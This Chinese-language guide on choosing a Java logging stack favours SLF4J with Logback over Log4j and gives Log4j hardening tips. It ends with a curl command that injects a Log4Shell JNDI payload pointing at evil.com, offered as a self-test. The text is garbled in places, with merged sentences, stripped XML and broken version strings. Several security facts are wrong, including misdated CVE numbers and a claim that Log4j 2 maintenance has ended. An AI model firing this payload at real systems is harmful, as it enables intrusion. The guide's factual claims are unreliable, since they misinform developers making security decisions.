应优先选用 SLF4J + Logback 组合,因其轻量、稳定、无反射风险且为 Spring Boot 默认方案;Log4j 2.x 已停更,旧版存在严重 RCE 漏洞,Log4j 1.x 已终止维护且功能落后。
Log4j 2.x 已不再被推荐用于新项目,log4j-core 在 2.17.0 之前存在严重远程代码执行漏洞(CVE-2025-44228 等),且 Apache 官方已于 2025 年底结束对 Log4j 2 的维护。当前 Java 日志开发环境的合理起点是 slf4j-api + logback-classic,或至少使用 Log4j 2.20.0+(启用 log4j2.formatMsgNoLookups=true 并禁用 JNDI)。
Log4j 1.x 已于 2015 年 EOL,不支持异步日志、Lambda 延迟求值、现代配置格式;Log4j 2.0–2.19.0 存在多个高危反序列化与 lookup 漏洞,即使加 -Dlog4j2.formatMsgNoLookups=true 也不能完全规避(如 CVE-2025-45046)。生产环境若强制使用旧版,必须配合字节码增强(如 log4j-jndi-be-gone)或 JVM 参数封锁 JNDI 协议。
org.apache.log4j.Logger 无法桥接到 SLF4J,log4j.properties 不支持 YAML/JSON${jndi:ldap://} 解析,任意日志内容含该字符串即可能触发 RCElog4j2.noFormatMsgLookup=true(2.20.0 后改名为 log4j2.formatMsgNoLookups)才安全这是 Spring Boot 默认方案,也是目前最轻量、稳定、可扩展的日志组合。SLF4J 是门面接口,Logback 是原生实现,无需桥接器,无反射调用风险。
org.slf4j slf4j-api2.0.1 2
ch.qos.logback logback-classic1.4.14
注意:logback-classic 会自动拉取 logback-core 和 slf4j-api,无需重复声明。若项目中已存在其他日志实现(如 Log4j 2),需排除其传递依赖,否则运行时可能报 Multiple bindings 警告。
logback.xml 必须放在 src/main/resources/ 下,且根元素为 或使用 AsyncAppender。
UTF-8 fileNamePattern 含日期占位符(如 log.%d{yyyy-MM-dd}.%i.log),且 additivity="false" 意外屏蔽maxFileSize(如 1GB)且未配 maxHistory,会导致首次归档扫描耗时极长仅限 Log4j 2.20.0+,且必须同时满足三项:
2.20.0 -Dlog4j2.formatMsgNoLookups=true -Dlog4j2.enableDirectEncoders=true
log4j2.xml 中禁用全部 lookup:移除所有 ${ 开头的变量引用,或改用 ${env:HOME} 这类白名单类型(2.20.0+ 默认只允许 env, sys, java)示例最小安全配置片段:
真正麻烦的从来不是“怎么配”,而是“怎么确认它没在偷偷解析 JNDI”——建议上线前用 curl -v 'http://your-app/log?msg=${jndi:ldap://evil.com/a}' 测试是否仍有 DNS 请求发出。